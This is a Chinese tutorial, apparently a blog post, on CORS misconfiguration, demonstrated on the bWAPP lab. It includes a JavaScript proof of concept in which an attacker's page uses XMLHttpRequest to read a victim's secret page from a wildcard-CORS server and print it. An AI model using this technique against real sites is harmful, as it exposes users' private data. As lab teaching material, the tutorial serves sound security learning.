CORS

CORS(Cross-origin resource sharing),又称跨域资源共享。CORS的内容不叙述,可以阅读MDN文档。或者,阅读这篇文章:跨域资源共享 CORS 详解,同时还需要了解同源策略。CORS是一种实现ajax跨域加载资源的机制,如果CORS配置不当,就可能出现安全问题。是否存在安全问题,需要关注的响应头是:Access-Control-Allow-Origin,它确定了可以访问页面的来源。

BWAPP的CORS测试

low级别

1、主页面,点击 secret 跳转页面。

image

2、假设这是用户的页面,攻击者的目的是盗取里面的sercet内容。查看请求这个页面时的HTTP响应头,从Access-Control-Allow-Origin头可以看出服务器配置了CORS," * "表示所有的源服务器都可以加载这个页面上的资源。既然如此,攻击者直接发送一个自己构造的页面链接给用户,用户点击后,攻击页面使用ajax就可以直接读取另一个网站的敏感信息。

网站页面

HTTP响应头

window.onload = function(){

var xhr =new XMLHttpRequest(); // 创建AJAX的对象

// 设置使用的请求方式

xhr.open('get','http://192.168.253.132/bwapp/bwapp/secret-cors-1.php' ,true);

xhr.send(); // 发送请求

xhr.onreadystatechange=function(){

if(xhr.readyState === 4 ){ // 状态 4 表示服务器已响应

// 判断正常的响应结果的状态码

if(xhr.status >=200 && xhr.status<300 || xhr.status === 304){

console.log(xhr.responseText); // 获取响应体内容

}else{

console.log('0');

}

}

}

}

4、用户点击这个链接,加载test.html页面,里面的js代码就会执行,然后发送请求,处理响应结果。可以看到,控制台输出的信息就是另一个网站的页面信息。

攻击者服务器上的页面

php配置cors跨域漏洞怎么修复,CORS跨域漏洞的简单认识相关推荐

  1. php文件跨站漏洞防御,修复PHP跨站脚本攻击漏洞(XSS)方法

    1.昨天360站长之家开通官网直达,安全报高突然报[高危]跨站脚本攻击漏洞,必须修复才可进行官网直达. 2.神马是XSS,额我也不懂,百度如下: 用户在浏览网站.使用即时通讯软件.甚至在阅读电子邮件时 ...

  2. 网站漏洞检测修复 短息轰炸漏洞检测与修补方案

    很多公司网站的被攻击,被篡改,都是存在着网站漏洞隐患的,也有很多客户找到我们SINE安全公司,对自己公司网站进行渗透测试服务,以及网站的安全检测,漏洞检测整体的安全服务,我们SINE安全在日常对客户网 ...

  3. 短文件名漏洞如何修复_短文件名漏洞修复

    短文件名漏洞其实在13年时还是很令人耳熟能详的,不过随着所在公司的编码语言转型,目前使用ASP.NET的新项目基本上没有了,而更多的是对原来的采用ASP.NET语言开发的项目进行维护或打个补丁. 事出 ...

  4. 常见web安全漏洞及修复建议

    文章目录 常见WEB漏洞 高危漏洞 SQL Injection(SQL注入攻击) 漏洞描述 修复建议 Cross-site scripting(跨站脚本攻击,简称XSS) 漏洞描述 修复建议 Brok ...

  5. CORS跨域漏洞的学习(防止CSRF漏洞导致的漏洞)

    0x00 从浏览器的同源策略说起 SOP,同源策略 (Same Origin Policy),该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站.恶意网站 ...

  6. CORS 请求未能成功_当遇到跨域开发时, 我们如何处理好前后端配置和请求库封装(koa/axios版)...

    我们知道很多大型项目都或多或少的采用跨域的模式开发, 以达到服务和资源的解耦和高效利用. 在大前端盛行的今天更为如此, 前端工程师可以通过nodejs或者Nginx轻松搭建起web服务器.这个时候我们 ...

  7. php csrf jsonp,读取型CSRF(JSONP劫持、CORS跨域资源读取、Flash跨域劫持)

    我们只熟悉写入型csrf,像修改用户信息--今天介绍一下读取型CSRF,使用DoraBox这个靶场来演示一波! 地址:https://github.com/Acmesec/DoraBox JSONP劫 ...

  8. web漏洞挖掘指南-前端跨域漏洞

    web漏洞挖掘指南 前端跨域漏洞 一.何为跨域 1.设想一种场景,一个恶意网站上嵌入了一个iframe标签去加载银行的登陆页面,高度和宽度的设置和真实的银行官网一样,当用户访问恶意网站并登录时,攻击者 ...

  9. 循序渐进Python3(十一) --6--  Ajax 实现跨域请求 jsonp 和 cors

    Ajax操作如何实现跨域请求? Ajax (XMLHttpRequest)请求受到同源策略的限制. Ajax通过XMLHttpRequest能够与远程的服务器进行信息交互,另外XMLHttpReque ...

最新文章

  1. csgo 人数文件_学生机简单开一个CSGO的社区服务器
  2. 【正一专栏】保护孩子人人有责-评南京猥亵女童案
  3. 现在学Java有前途吗?Java岗位饱和了吗?
  4. 当爬虫工程师遇到 CTF丨2021 年 B 站 1024 安全攻防题解
  5. 宿主机为linux、windows分别实现VMware三种方式上网(转)
  6. Q98:三角形网格细分Bezier曲面时,注意三角形顶点的顺序(确保其对应的法向量向外)
  7. java编写Linux文件共享,ubuntu下用samba实现windows与linux文件共享
  8. 2015/7/24 (等待回调,结果是盘中回调,盘末拉升,错过了进仓机会吗?详情进入...
  9. 整理 深入理解RunLoop
  10. python调用nmap扫描局域网存活主机和端口
  11. 【数字图像处理】-图像位数
  12. 制作字幕.html教程,怎样制作视频字幕
  13. 计算机中应用g,CH340g使用说明详解 - 全文
  14. MS SQL Server 数据库连接字符串详解
  15. python 实现轨迹数据可视化
  16. Google Earth Engine——MODIS Combined 16-Day NDVI逐年合成影像循环下载
  17. 通过ip查看主机名 通过主机名查看ip
  18. xftp的免费下载和安装教程
  19. ZUCC_大数据计算技术_大作业
  20. 优化算法-3:RMSProp算法和Adam算法

热门文章

  1. wxWidgets:常用对话框演示
  2. wxWidgets:wxDataViewTreeCtrl类用法
  3. boost::mpl模块实现logical相关的测试程序
  4. boost::mp11::mp_push_back相关用法的测试程序
  5. boost::math::tools::sum_series用法的测试程序
  6. boost::boyer_myrvold_params::kuratowski_subgraph用法的测试程序
  7. boost::fusion::convert用法的测试程序
  8. boost::reference_wrapper用法实例
  9. ITK:清除四边网格
  10. ITK:轮廓空间对象